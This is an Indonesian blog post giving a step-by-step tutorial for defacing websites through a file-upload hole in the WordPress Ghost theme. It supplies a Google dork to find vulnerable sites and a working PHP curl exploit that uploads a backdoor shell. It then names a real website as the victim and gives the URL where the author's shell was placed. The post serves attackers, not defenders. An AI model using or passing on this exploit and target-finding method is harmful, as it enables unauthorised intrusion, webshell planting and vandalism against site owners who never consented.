SAMSUNG CUSTOM ROM
  • Home
  • Samsung
  • Oppo
  • Lenovo
  • Sony Xperia
  • Apk File
Beranda » Tanpa Kategori » Cara deface dengan Teknik WordPress Ghost theme File Upload Sapu-Bitink Was Here

Cara deface dengan Teknik WordPress Ghost theme File Upload Sapu-Bitink Was Here

kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416


Cara deface kali ini membutuhkan bantuan XAMPP

Download XAMPP : DISINI

Google Dork : inurl:wp-content/themes/Ghost/

Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini

Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )




Sekarang Copy Exploitnya


<?php
$uploadfile="yourFile.php";
$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Lalu yourFile.php diganti dengan nama shell backdoor kalian yang sudah di masukan ke dalam folder xampp>php

Disini nama shell saya 007.php

dan juga masukin target nya dengan mencari mengunakan dork yang tadi

disini saya mendapat target http://www.hibra.com.ar/

sekarang kita hanya perlu menambahkan

/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Dan akan menjadi seperti ini http://www.hibra.com.ar/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php 

Dan bila ada tulisan {"status":"NOK", "ERR":"This file is incorect"}

itu biasa nya VULN

setelah itu simpan...disini saya simpan dengan nama x.php

sekarang kita buka CMD

buka exploit tersebut mengunakan CMD

 karna saya simpan dengan nama x.php jadi untuk membuka nya php x.php



Bila muncul seperti ini berarti berhasil

Untuk shell Acces berada disini http://site.com/wp-content/uploads/settingsimages/namashell.php

Karna nama shell saya 007 jadi membuka shell nya http://www.hibra.com.ar/wp-content/uploads/settingsimages/007.php
Tweet

Jangan sampai ketinggalan postingan-postingan terbaik dari SAMSUNG CUSTOM ROM. Berlangganan melalui email sekarang juga:

Atau sobat juga bisa follow SAMSUNG CUSTOM ROM dengan mengklik tombol di bawah ini:

follow mas sugeng

Artikel keren lainnya:

Blogger Templates
Ditulis oleh hendry pada tanggal Tuesday, November 12, 2013
Newer Post
Older Post
Home
Copyright © 2014 SAMSUNG CUSTOM ROM - Powered by Blogger
Template by Mas Sugeng - Versi Seluler